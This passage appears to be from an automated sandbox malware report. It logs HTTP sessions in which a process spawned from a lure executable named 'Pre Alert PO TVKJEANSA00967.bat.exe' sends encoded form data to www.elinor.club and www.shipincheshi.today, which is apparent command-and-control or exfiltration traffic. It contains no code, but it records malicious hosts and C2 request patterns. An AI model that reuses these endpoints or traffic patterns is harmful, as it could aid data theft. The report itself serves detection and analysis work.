                                                                                                            Data Raw: 4c 52 57 3d 67 58 70 2f 68 49 6c 4c 66 78 74 50 30 6b 4f 6b 6f 53 7a 35 6e 58 73 2f 79 52 53 74 75 4b 58 75 38 6a 36 76 68 70 4a 45 50 69 63 4a 75 4a 42 39 49 6c 30 75 31 6f 36 77 78 43 71 52 31 35 55 54 64 4a 4f 69 77 7a 61 69 4a 53 6a 46 79 64 75 4d 55 4f 6f 63 41 57 4f 4c 61 2f 36 6d 68 79 48 32 47 73 6a 6a 4e 53 32 78 6a 63 6f 78 59 45 56 76 6c 4e 56 43 69 72 4e 6c 6d 52 52 72 56 56 56 65 74 71 4a 63 6e 7a 72 46 42 37 4b 4d 56 4f 42 49 6e 62 35 49 49 6f 4e 79 4e 33 6b 63 50 35 52 59 55 68 54 51 42 75 30 66 4f 42 51 6c 4e 74 4d 34 63 77 5a 7a 4e 5a 52 74 6c 68 38 48 43 61 54 73 68 38 55 35 6d 34 66 77 69 64 52 6f 51 45 4d 66 37 76 69 61 32 39 2b 6f 34 6c 4f 64 64 79 39 55 4e 57 6d 2f 71 68 50 6d 2f 6c 66 51 2f 7a 39 42 42 77 77 6f 43 43 47 76 38 51 6c 77 39 2f 76 44 61 71 35 6f 62 31 4d 65 36 6e 62 51 6d 6a 6a 57 46 45 5a 51 65 50 65 54 65 4c 5a 4c 58 50 63 58 2b 45 66 45 55 44 78 4b 75 4a 78 69 6c 7a 48 59 70 41 36 36 50 4c 70 46 64 6f 6b 63 41 77 75 51 44 43 63 72 36 63 47 75 36 4c 61 48 75 61 [TRUNCATED]
                                                                                                            Data Ascii: LRW=gXp/hIlLfxtP0kOkoSz5nXs/yRStuKXu8j6vhpJEPicJuJB9Il0u1o6wxCqR15UTdJOiwzaiJSjFyduMUOocAWOLa/6mhyH2GsjjNS2xjcoxYEVvlNVCirNlmRRrVVVetqJcnzrFB7KMVOBInb5IIoNyN3kcP5RYUhTQBu0fOBQlNtM4cwZzNZRtlh8HCaTsh8U5m4fwidRoQEMf7via29+o4lOddy9UNWm/qhPm/lfQ/z9BBwwoCCGv8Qlw9/vDaq5ob1Me6nbQmjjWFEZQePeTeLZLXPcX+EfEUDxKuJxilzHYpA66PLpFdokcAwuQDCcr6cGu6LaHuahmatuCJFZsfjFd9QQBrlbGTpidooDuM0FvRp+ukpme2vFEO2RuMTFDCFAddIwoKziDKEBhEH/KD4aQcMAoE3mndrbLpltrdB67Ky2P8jzua75agFHLSUYCrYWtXRaiII5TaRzFeNunxRFTw1EMDzWQ+B3UTuJKq8URM1qOU9JnBvc75TQJFEzJ5zcOuI/Zxi/F+YNP2OBx9ANnzAgczp8/tRWU9qIJUllTB8sgET2BIk5veEP4QaPQq6KacAR9DypRnh/CUnzaJdH9xz5SwAgZwQEkgWkS4mWRfxxeGfQkqg780vCMhNOawx/Xpu8tq6jtk2pskAbwKY8Z7QeSaxKH+qkOPYp9c/GhkiU1/DBiqGGO3jQsXZ1coT8kL7w43ljKgubBu38DpEMP7L9YX0A485BJ7Nk5Gk9j7dQxUXxjqxIflqA1nnvFVO6R7jN6ALNEvTnUnOol9TmWCkkXvIxOJMDTG1c9fYzfHvvpqnTaa0fmAL/mKIPQT+t59N+MB+sZIdHrvse8R4z7hkfRw4yA5e9xml2SFHktOoK19ewrer4vTHN+9w2Wdm8Dy7pwiJctrmpP30jkBenSIOOV/Bc0EqVdut1Ew0IliPomLrAo4ymWY7a4T9YonzKIVFqL7pbkmelj87lgsC3yJDPH3lnqvMGbp/Ff/WU5 [TRUNCATED]


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.2.449860154.23.176.197805608C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 27, 2024 16:44:14.372795105 CET467OUTGET /b20s/?LRW=tVBfi4VbWyAR4A6JwX/2lnpR3RCqqMOz/iPk8q4RNy1B2px1ZjxG3cjS/n2u+as/M6yp5i3EDz3+5965KIAUeXyPV8KfzAH0F+33TTK6hNoSGlASxdt3tI0=&fvqp6=9vfXK HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                            Host: www.shipincheshi.today
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                                                                                                            Nov 27, 2024 16:44:16.038902998 CET1236INHTTP/1.1 404 Not Found
                                                                                                            Date: Wed, 27 Nov 2024 15:58:32 GMT
                                                                                                            Server: Apache
                                                                                                            Upgrade: h2
                                                                                                            Connection: Upgrade, close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e5 8f 91 e7 94 9f e9 94 99 e8 af af 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 36 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d [TRUNCATED]
                                                                                                            Data Ascii: 2000<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title></title> <meta name="robots" content="noindex,nofollow" /> <style> /* Base */ body { color: #333; font: 16px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{ color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3{ margin: 12px; font-size: 16px; font-weight: bold; } abbr{ cursor: help; text-decoration: underline; text-decoration-style: dotted; } a{ color [TRUNCATED]
                                                                                                            Nov 27, 2024 16:44:16.038922071 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a
                                                                                                            Data Ascii: cursor: pointer; } a:hover{ text-decoration: underline; } .line-error{ background: #f8cbcb; } .echo table { width: 100%; } .echo pr
                                                                                                            Nov 27, 2024 16:44:16.038995981 CET448INData Raw: 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 39 39 39 3b 0a
                                                                                                            Data Ascii: padding: 16px; border-radius: 4px; background: #999; } .exception .source-code{ padding: 6px; border: 1px solid #ddd; background: #f9f9f9; overflow-x
                                                                                                            Nov 27, 2024 16:44:16.039007902 CET1236INData Raw: 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20
                                                                                                            Data Ascii: ne-block; min-width: 100%; box-sizing: border-box; font-size:14px; font-family: "Century Gothic",Consolas,"Liberation Mono",Courier,Verdana; padding-left: 48px; } .excepti
                                                                                                            Nov 27, 2024 16:44:16.039097071 CET1236INData Raw: 20 2a 2f 0a 20 20 20 20 20 20 20 20 2e 65 78 63 65 70 74 69 6f 6e 2d 76 61 72 20 74 61 62 6c 65 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 32 70
                                                                                                            Data Ascii: */ .exception-var table{ width: 100%; margin: 12px 0; box-sizing: border-box; table-layout:fixed; word-wrap:break-word; } .exception-var table cap
                                                                                                            Nov 27, 2024 16:44:16.039108992 CET1236INData Raw: 6e 74 73 20 77 69 74 68 20 74 68 65 20 63 6c 61 73 73 65 73 20 62 65 6c 6f 77 20 61 72 65 20 61 64 64 65 64 20 62 79 20 70 72 65 74 74 79 70 72 69 6e 74 2e 20 2a 2f 0a 20 20 20 20 20 20 20 20 70 72 65 2e 70 72 65 74 74 79 70 72 69 6e 74 20 2e 70
                                                                                                            Data Ascii: nts with the classes below are added by prettyprint. */ pre.prettyprint .pln { color: #000 } /* plain text */ pre.prettyprint .str { color: #080 } /* string content */ pre.prettyprint .kwd { color: #008 } /* a keywor
                                                                                                            Nov 27, 2024 16:44:16.039123058 CET1236INData Raw: 65 70 74 69 6f 6e 5c 48 74 74 70 45 78 63 65 70 74 69 6f 6e 22 3e 48 74 74 70 45 78 63 65 70 74 69 6f 6e 3c 2f 61 62 62 72 3e 20 69 6e 20 3c 61 20 63 6c 61 73 73 3d 22 74 6f 67 67 6c 65 22 20 74 69 74 6c 65 3d 22 2f 77 77 77 2f 77 77 77 72 6f 6f
                                                                                                            Data Ascii: eption\HttpException">HttpException</abbr> in <a class="toggle" title="/www/wwwroot/jianche.zhongzhuankk144.sbs/thinkphp/library/think/route/dispatch/Module.php line 62">Module.php line 62</a></h2> </div> <div><
                                                                                                            Nov 27, 2024 16:44:16.039302111 CET896INData Raw: 3c 63 6f 64 65 3e 20 20 20 20 20 20 20 20 7d 0a 3c 2f 63 6f 64 65 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 6e 65 2d 36 35 22 3e 3c 63 6f 64 65 3e 0a 3c 2f 63 6f 64 65 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 6e 65
                                                                                                            Data Ascii: <code> }</code></li><li class="line-65"><code></code></li><li class="line-66"><code> // </code></li><li class="line-67"><code> $convert = is_bool($this-&gt;convert) ? $this-&gt;con
                                                                                                            Nov 27, 2024 16:44:16.039330006 CET1236INData Raw: 72 6f 75 74 65 2f 64 69 73 70 61 74 63 68 2f 4d 6f 64 75 6c 65 2e 70 68 70 20 6c 69 6e 65 20 36 32 22 3e 4d 6f 64 75 6c 65 2e 70 68 70 20 6c 69 6e 65 20 36 32 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: route/dispatch/Module.php line 62">Module.php line 62</a></li> <li> at <abbr title="think\route\dispatch\Module">Module</abbr>->init() in <a class="toggle" title="/www/wwwroot/jianche.zhongzhuank
                                                                                                            Nov 27, 2024 16:44:16.039341927 CET224INData Raw: 70 52 33 52 43 71 71 4d 4f 7a 2f 69 50 6b 38 71 34 52 4e 79 31 42 32 70 78 31 5a 6a 78 47 33 63 6a 53 2f 6e 32 75 20 61 73 2f 4d 36 79 70 35 69 33 45 44 7a 33 20 35 39 36 35 4b 49 41 55 65 58 79 50 56 38 4b 66 7a 41 48 30 46 20 33 33 54 54 4b 36
                                                                                                            Data Ascii: pR3RCqqMOz/iPk8q4RNy1B2px1ZjxG3cjS/n2u as/M6yp5i3EDz3 5965KIAUeXyPV8KfzAH0F 33TTK6hNoSGlASxdt3tI0= </td> </tr> <tr> <td>fvqp6</td>
                                                                                                            Nov 27, 2024 16:44:16.159933090 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 39 76 66 58 4b 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 64 3e 0a 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: <td> 9vfXK </td> </tr> </tbody> </table> <table> <caption>POST Data<small>empty</s


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.2.449878194.58.112.174805608C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 27, 2024 16:44:21.925726891 CET722OUTPOST /7plr/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.elinor.club
                                                                                                            Origin: http://www.elinor.club
                                                                                                            Referer: http://www.elinor.club/7plr/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Connection: close
                                                                                                            Cache-Control: no-cache
                                                                                                            Content-Length: 200
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                                                                                                            Data Raw: 4c 52 57 3d 6d 2f 6f 31 71 6a 52 6e 48 77 62 37 44 58 61 41 42 33 73 32 75 4c 73 2f 5a 6d 4a 65 64 74 7a 2b 58 65 6c 56 78 30 6f 4d 67 57 65 6b 53 4d 33 4b 41 56 67 74 30 72 41 6b 45 68 6a 42 64 32 37 57 58 52 31 30 4f 4e 6a 55 65 34 46 52 71 6b 6c 7a 77 34 34 6a 42 30 4d 54 53 72 77 4b 42 57 63 36 36 6c 45 57 61 79 66 5a 67 47 46 77 34 4d 78 6c 5a 74 31 55 71 56 66 79 50 44 56 67 36 51 4e 72 4c 33 45 62 59 6a 72 43 4b 52 67 7a 79 45 6c 55 41 45 2b 79 73 53 65 78 39 61 36 33 39 37 73 49 53 39 53 4a 57 46 70 4e 4d 56 42 65 64 58 6c 63 2f 74 4e 36 53 35 41 7a 70 4a 4d 74 50 4d 71 31 63 41 3d 3d
                                                                                                            Data Ascii: LRW=m/o1qjRnHwb7DXaAB3s2uLs/ZmJedtz+XelVx0oMgWekSM3KAVgt0rAkEhjBd27WXR10ONjUe4FRqklzw44jB0MTSrwKBWc66lEWayfZgGFw4MxlZt1UqVfyPDVg6QNrL3EbYjrCKRgzyElUAE+ysSex9a6397sIS9SJWFpNMVBedXlc/tN6S5AzpJMtPMq1cA==
                                                                                                            Nov 27, 2024 16:44:23.316205025 CET341INHTTP/1.1 302 Moved Temporarily
                                                                                                            Server: nginx
                                                                                                            Date: Wed, 27 Nov 2024 15:44:23 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 154
                                                                                                            Connection: close
                                                                                                            Location: http://elinor.club/7plr/
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.2.449884194.58.112.174805608C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 27, 2024 16:44:24.587764978 CET742OUTPOST /7plr/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.elinor.club
                                                                                                            Origin: http://www.elinor.club
                                                                                                            Referer: http://www.elinor.club/7plr/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Connection: close
                                                                                                            Cache-Control: no-cache
                                                                                                            Content-Length: 220
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                                                                                                            Data Raw: 4c 52 57 3d 6d 2f 6f 31 71 6a 52 6e 48 77 62 37 52 44 6d 41 44 51 34 32 69 37 73 34 56 47 4a 65 45 39 7a 36 58 65 70 56 78 31 38 63 68 67 4f 6b 53 6f 37 4b 42 58 49 74 78 72 41 6b 63 52 6a 45 41 47 37 6a 58 51 49 4a 4f 4d 50 55 65 34 52 52 71 68 42 7a 78 4c 51 67 42 6b 4d 52 55 72 77 79 4d 32 63 36 36 6c 45 57 61 78 6a 2f 67 47 64 77 34 38 68 6c 66 35 42 56 6e 31 66 78 4d 44 56 67 77 41 4d 69 4c 33 45 74 59 6d 58 6f 4b 56 51 7a 79 47 39 55 48 56 2b 78 6c 53 65 7a 67 4b 37 59 38 37 35 2f 4b 50 6e 64 66 46 74 44 4e 52 78 6c 52 78 6f 47 75 63 73 74 41 35 6b 41 30 4f 46 5a 43 50 58 38 48 46 41 54 54 41 4d 57 39 33 61 49 38 35 67 44 75 63 64 78 56 77 38 3d
                                                                                                            Data Ascii: LRW=m/o1qjRnHwb7RDmADQ42i7s4VGJeE9z6XepVx18chgOkSo7KBXItxrAkcRjEAG7jXQIJOMPUe4RRqhBzxLQgBkMRUrwyM2c66lEWaxj/gGdw48hlf5BVn1fxMDVgwAMiL3EtYmXoKVQzyG9UHV+xlSezgK7Y875/KPndfFtDNRxlRxoGucstA5kA0OFZCPX8HFATTAMW93aI85gDucdxVw8=
                                                                                                            Nov 27, 2024 16:44:25.958144903 CET341INHTTP/1.1 302 Moved Temporarily
                                                                                                            Server: nginx
                                                                                                            Date: Wed, 27 Nov 2024 15:44:25 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 154
                                                                                                            Connection: close
                                                                                                            Location: http://elinor.club/7plr/
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            15192.168.2.449891194.58.112.174805608C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 27, 2024 16:44:27.263787031 CET10824OUTPOST /7plr/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.elinor.club
                                                                                                            Origin: http://www.elinor.club
                                                                                                            Referer: http://www.elinor.club/7plr/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Connection: close
                                                                                                            Cache-Control: no-cache
                                                                                                            Content-Length: 10300
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                                                                                                            Data Raw: 4c 52 57 3d 6d 2f 6f 31 71 6a 52 6e 48 77 62 37 52 44 6d 41 44 51 34 32 69 37 73 34 56 47 4a 65 45 39 7a 36 58 65 70 56 78 31 38 63 68 67 47 6b 54 62 7a 4b 41 77 38 74 32 72 41 6b 43 68 6a 46 41 47 37 45 58 51 51 4e 4f 4d 54 71 65 37 70 52 71 44 4a 7a 32 36 51 67 4b 6b 4d 52 57 72 77 4a 42 57 64 67 36 6c 55 53 61 79 62 2f 67 47 64 77 34 2b 4a 6c 4a 64 31 56 6c 31 66 79 50 44 56 73 36 51 4e 48 4c 33 63 39 59 6e 6a 53 4c 6b 73 7a 79 6d 74 55 47 6e 47 78 75 53 65 31 6a 4b 37 41 38 37 6c 67 4b 50 37 52 66 47 77 6f 4e 57 42 6c 52 77 52 36 7a 75 30 52 53 49 45 34 78 50 78 74 46 74 54 45 4a 6e 38 31 55 54 41 2f 6c 6c 72 6d 2f 4a 6c 76 70 75 68 55 42 56 48 6e 76 57 68 33 78 30 46 73 47 56 39 6d 33 65 31 42 33 45 2b 42 4f 4c 6c 4b 44 53 44 54 64 4c 7a 4e 39 6e 58 77 72 2b 44 33 62 6d 6b 4b 59 46 62 71 68 74 6c 54 6e 68 59 55 42 39 4a 44 52 55 69 5a 64 5a 49 2b 7a 73 46 72 4c 66 50 2b 78 46 4e 51 75 2b 43 57 56 73 57 34 35 63 32 52 4a 76 6c 6f 79 7a 4b 55 35 78 72 76 79 73 59 78 4e 66 73 2f 32 59 4e 43 6b 32 [TRUNCATED]
                                                                                                            Data Ascii: LRW=m/o1qjRnHwb7RDmADQ42i7s4VGJeE9z6XepVx18chgGkTbzKAw8t2rAkChjFAG7EXQQNOMTqe7pRqDJz26QgKkMRWrwJBWdg6lUSayb/gGdw4+JlJd1Vl1fyPDVs6QNHL3c9YnjSLkszymtUGnGxuSe1jK7A87lgKP7RfGwoNWBlRwR6zu0RSIE4xPxtFtTEJn81UTA/llrm/JlvpuhUBVHnvWh3x0FsGV9m3e1B3E+BOLlKDSDTdLzN9nXwr+D3bmkKYFbqhtlTnhYUB9JDRUiZdZI+zsFrLfP+xFNQu+CWVsW45c2RJvloyzKU5xrvysYxNfs/2YNCk2sxH8cZnM029lf3Lpc8UuVnIEh/guB5djRneXHMpOhrgc89UXLovSB0Y0nmPZM3hDMuR/PzCA8B1rpbyTlcu5EQJD5CyIaLonaiBgA8MQ7zfCbnhAGaDbXDRUjRTtksNorDWUJ3LdwHq8fcu1OscLR8oqkZ9u+L4dJx6LMVzGWaee42Vlonf3PXnvIzI7YBCO+MsWJln+Z/hQYgap4mbUZBhkP3Rmkk1x3dWVoA841g1V9d9lja35UcNFVjYuQom7F8T8Ov6xaTwROedEZBNoPbYi7T1TrTPaUfnW9wDNmmFeUPn+NMipxR1hE0e/+ET8/mbB86zr6yv5Nw7RSkRHIy7CmQl7IE9G7bRoONYFVDWxexnmyGMQY48kHJiMzqeL5ilKju1hWA0r4RUFQGZVicXCf2kAtWF1DEdaX7014esOSJoFdU/5+eLlbvzR8wGBjwY4cS3eKkvOEyYNpmNT/9lramgdSQTiT8j9torUfpMKrThhgOsVFLZvxyxHXenkbGM2bI2vmckI2lyd+B4GvAwn++4NwHcBuyq5RYSSlvuJSjVkFQMSm/114CjHvqcSZ69DjEesFrnl440E5jQCuWosKzUaZ0M6z3fFuNRXyS/ZyR+5kybzexzgfFMBXmseFeeC9btvwx6ixk3bhGPgpwZWWXt/aCWUYJ [TRUNCATED]
                                                                                                            Nov 27, 2024 16:44:28.671099901 CET341INHTTP/1.1 302 Moved Temporarily
                                                                                                            Server: nginx
                                                                                                            Date: Wed, 27 Nov 2024 15:44:28 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 154
                                                                                                            Connection: close
                                                                                                            Location: http://elinor.club/7plr/
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            16192.168.2.449898194.58.112.174805608C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 27, 2024 16:44:29.924264908 CET460OUTGET /7plr/?fvqp6=9vfXK&LRW=r9AVpTZFPDO8VTu/ciknjINDVEp/PvrjGtBP7U8RvBiODJ3oM2lL+vM7NE/eWH/lfB0APMSfRaR1rRBz2uUzJ3oOd5olZUFD7UQvVw3JpX4K8u0SeOs3hkY= HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                            Host: www.elinor.club
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                                                                                                            Nov 27, 2024 16:44:31.285835981 CET478INHTTP/1.1 302 Moved Temporarily
                                                                                                            Server: nginx
                                                                                                            Date: Wed, 27 Nov 2024 15:44:31 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 154
                                                                                                            Connection: close
                                                                                                            Location: http://elinor.club/7plr/?fvqp6=9vfXK&LRW=r9AVpTZFPDO8VTu/ciknjINDVEp/PvrjGtBP7U8RvBiODJ3oM2lL+vM7NE/eWH/lfB0APMSfRaR1rRBz2uUzJ3oOd5olZUFD7UQvVw3JpX4K8u0SeOs3hkY=
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                            Click to jump to process

                                                                                                            Click to jump to process

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Click to jump to process

                                                                                                            Target ID:0
                                                                                                            Start time:10:42:26
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe
                                                                                                            Wow64 process (32bit):true
